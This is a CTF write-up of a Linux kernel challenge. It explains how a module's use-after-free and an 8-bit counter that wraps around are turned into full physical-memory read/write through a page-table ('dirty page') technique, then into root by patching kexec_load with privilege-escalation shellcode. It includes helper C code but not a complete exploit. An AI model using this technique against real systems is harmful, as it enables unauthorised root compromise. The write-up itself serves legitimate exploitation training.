BlackHat MEA CTF Qualification - Kinc write-up

Kinc was a kernel exploitation challenge with a vulnerable kernel module featuring a use-after-free bug. The module’s increment primitive had an 8-bit counter that could be overflowed to bypass usage restrictions.

We used the “dirty page” technique to replace freed kernel objects with page table entries. By mapping memory at specific addresses and using the vulnerable increment primitive to modify physical addresses within page tables, we gained read/write access to all physical memory. Finally, we patched the kexec_load syscall with privilege escalation shellcode to get root and retrieve the flag.

The bug

In this task, we’re given a buggy kernel module, and we’re asked to get root on a machine with this buggy module loaded. The module exposes a /dev/vuln device, with a handful of ioctls:

static struct kmem_cache *obj_cachep;
static DEFINE_MUTEX(module_lock);

unsigned char inc_used = 0;
struct obj *selected = 0;
struct obj *obj_array[MAX_OBJ_NUM] = { NULL };

static long module_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
  long ret = -EINVAL;
  mutex_lock(&module_lock);

  if (arg >= MAX_OBJ_NUM)
    goto out;

  switch (cmd) {
    case CMD_ALLOC:
      obj_array[arg] = kmem_cache_zalloc(obj_cachep, GFP_KERNEL);
      ret = 0;
      break;

    case CMD_SEL:
      if (!obj_array[arg])
        goto out;
      selected = obj_array[arg];
      ret = 0;
      break;

    case CMD_INC:
      if (inc_used++ > 1)
        goto out;
      selected->cnt++;
      ret = 0;
      break;

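    case CMD_DELETE:
      if (!obj_array[arg])
        goto out;
      /* Note: `selected` is not cleared here, so it may keep pointing
       * at the freed object (this is the use-after-free). */
      kmem_cache_free(obj_cachep, obj_array[arg]);
      obj_array[arg] = NULL;
      ret = 0;
      break;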
  }

 out:
  mutex_unlock(&module_lock);
  return ret;
}

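This module lets us allocate up to 256 “objects”, free previously allocated objects, “select” one object (this stores the pointer to the object in a static variable), and increment a field inside the selected object (the object is 0x800 bytes in size, and the field we’re incrementing is at offset 0x7f8). Deleting an object never clears the selected pointer, so once the selected object has been freed, the increment ioctl keeps writing to freed memory. That is the use-after-free.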

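It seems that the authors meant the increment primitive to be usable only a very limited number of times, but inc_used is an 8-bit unsigned char and it is post-incremented on every CMD_INC call, including the rejected ones. After 256 calls it wraps around to 0 and the check passes again, so this restriction is not really an issue: it only makes each increment cost more ioctl calls.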
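To make the wrap-around concrete, here is a minimal userspace model of the CMD_INC gate exactly as it appears in the listing above. It is only a simulation, not the module: the helper names inc_gate and count_successful_incs are made up for illustration.

```c
#include <stdbool.h>

/* Userspace model of the module's 8-bit usage counter (not the module itself). */
static unsigned char inc_used = 0;

/* Mirrors `if (inc_used++ > 1) goto out;` from the listing.
 * Returns true when the increment would actually be performed.
 * The counter advances on every call, even on rejected ones. */
static bool inc_gate(void) {
    return !(inc_used++ > 1);
}

/* Counts how many of `calls` consecutive CMD_INC ioctls would get through. */
static unsigned long count_successful_incs(unsigned long calls) {
    unsigned long ok = 0;
    for (unsigned long i = 0; i < calls; i++) {
        if (inc_gate())
            ok++;
    }
    return ok;
}
```

With the check as shown, every window of 256 calls lets the same small number of increments through, so an arbitrary number of increments is just a matter of looping over the ioctl.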

Linux heap basics (really quickly)

In the Linux kernel, allocations are usually performed from so-called slabs. This means that a page is divided into consecutive chunks of the same size, and they are allocated/freed as necessary. A page is never shared between different slabs at the same time. There are both “generic” slabs for kmalloc allocations of common sizes, and specialized slabs that hold only one type of object (like the one used in this task).

The “Dirty page” technique

Since reallocating a freed struct obj with another struct obj is not very useful, and the slab is specialized, what we have to do is free the whole page containing the freed object, and replace it with a completely different type of page. A common technique here is to reallocate it as a pagetable for a userspace process.

So, the exploit flow is as follows:

1. Allocate a bunch of vulnerable objects, “select” one of them, then free the objects.
2. Use memfd_create to get an ephemeral in-memory file, resize it to 1 page (4096 bytes), and map it at multiple addresses, whose lower 21 bits are 0xff000. This ensures that a separate page table is allocated for each mapping, and the shared page’s physical address is stored at offset 0x7f8 inside the page table.
3. Use the vulnerable increment primitive to “increment” the vulnerable object 4096 times. This makes the address in the page table point to the next physical page instead of the original one.
4. Flush the TLB by mprotecting the mappings to RO and back to RW and reprobing every page.
5. Find the one page where the page contents differ from the other pages.
6. Keep incrementing the vulnerable object until our buggy page looks like a page table (has a single nonzero qword at offset 0x7f8, whose lowermost byte is 0x67 and uppermost byte is 0x80).
7. Replace that mapping with 7 (which points to physical address 0 with user RWX permissions), search through the mappings again until we find a real-mode IVT in one of them.
8. Now we can write any 512 physical addresses (OR’ed with 7 to give userspace RW permissions) to the first bogus page, and access the corresponding pages through the second bogus mapping.
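The arithmetic behind this flow can be sketched in a few helpers. This is an illustration under assumptions, not the original exploit: it assumes x86-64 with 4 KiB pages, and MAP_BASE, the 2 MiB stride, and all function names are hypothetical choices made for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define KINC_PAGE_SIZE 4096ULL
#define PTES_PER_TABLE 512
#define MAP_BASE       0x100000000ULL  /* hypothetical base address */
#define MAP_STRIDE     0x200000ULL     /* 2 MiB: one last-level page table each */

/* Address of the i-th mapping: lower 21 bits are always 0xff000. */
static uint64_t mapping_addr(unsigned i) {
    return MAP_BASE + (uint64_t)i * MAP_STRIDE + 0xff000ULL;
}

/* Byte offset of the PTE for `vaddr` inside its last-level page table:
 * bits 12..20 select one of 512 eight-byte entries. */
static size_t pte_offset(uint64_t vaddr) {
    return (size_t)((vaddr >> 12) & 0x1ff) * sizeof(uint64_t);
}

/* Number of +1 increments needed to move a PTE forward by `pages` frames. */
static uint64_t incs_for_pages(uint64_t pages) {
    return pages * KINC_PAGE_SIZE;
}

/* PTE value for `phys` with present | writable | user (0x7), NX clear. */
static uint64_t make_pte(uint64_t phys) {
    return (phys & ~0xfffULL) | 7;
}

/* The "looks like a page table" check: exactly one nonzero qword, at
 * offset 0x7f8, with low byte 0x67 and top byte 0x80. */
static bool looks_like_our_page_table(const uint64_t *page) {
    for (size_t i = 0; i < PTES_PER_TABLE; i++) {
        if (i == 0x7f8 / sizeof(uint64_t)) {
            if ((page[i] & 0xff) != 0x67 || (page[i] >> 56) != 0x80)
                return false;
        } else if (page[i] != 0) {
            return false;
        }
    }
    return true;
}
```

Since the object's counter field and the PTE of each mapping both sit at offset 0x7f8, every successful increment adds 1 to the PTE, and 4096 of them advance it by exactly one physical page while leaving the flag bits unchanged.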

After we’ve got RW access to all of the physical memory, all we need to do is to patch some useless syscall with shellcode that will give us root. I opted to replace kexec_load with a small shellcode that calls commit_creds(prepare_kernel_cred(&init_task)), which gives our process root & full capabilities. Since we’re working at physical memory level, memory permissions are not an issue, and we can just pattern-match the original kexec_load syscall and replace it with the shellcode. After that, a system("cat /dev/sdb") is all it takes to get the flag.
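The pattern-match-and-patch step could look roughly like the sketch below, applied to each physical page once it is reachable through the bogus mapping. The function name find_and_patch is hypothetical, and the actual byte pattern of kexec_load and the shellcode bytes depend on the kernel build, so they are left as parameters here.

```c
#include <stddef.h>
#include <string.h>

/* Searches `buf` for the first occurrence of `pattern` and overwrites it,
 * starting at the match, with `patch`. Returns the match offset, or -1 if
 * the pattern is absent or the patch would run past the end of the buffer. */
static long find_and_patch(unsigned char *buf, size_t len,
                           const unsigned char *pattern, size_t plen,
                           const unsigned char *patch, size_t patch_len) {
    if (plen == 0 || plen > len)
        return -1;
    for (size_t off = 0; off + plen <= len; off++) {
        if (memcmp(buf + off, pattern, plen) != 0)
            continue;
        if (off + patch_len > len)
            return -1;  /* patch does not fit inside this buffer */
        memcpy(buf + off, patch, patch_len);
        return (long)off;
    }
    return -1;
}
```

In this sketch a match that straddles two pages is not handled; scanning a window of two adjacent pages at a time would be one way to cover that case.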